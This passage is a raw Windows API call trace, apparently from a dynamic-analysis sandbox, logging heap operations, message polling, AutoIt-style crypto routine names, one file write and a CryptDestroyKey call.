hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0137.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0137.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15988) returned 0x2ed0fe8 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebb658 | out: hHeap=0x970000) returned 1 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0137.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.206] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0137.206] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0137.206] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0137.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.206] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.207] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.207] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.207] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0137.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.208] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0137.208] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebb658 | out: hHeap=0x970000) returned 1 [0137.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee6978 | out: hHeap=0x970000) returned 1 [0137.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebb658 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0137.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0137.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.233] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.234] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2b9a0*, nNumberOfBytesToWrite=0x15988, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2b9a0*, lpNumberOfBytesWritten=0x8cf5e4*=0x15988, lpOverlapped=0x0) returned 1 [0137.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.281] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0137.281] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0137.281] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.281] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0137.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0137.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0137.282] CryptDestroyKey (hKey=0xa87510) returned 1 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0137.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0137.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0137.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.283] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0137.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.284] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0137.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0137.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0137.285] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0137.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0137.285] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0137.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0137.286] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0137.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0137.286] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, 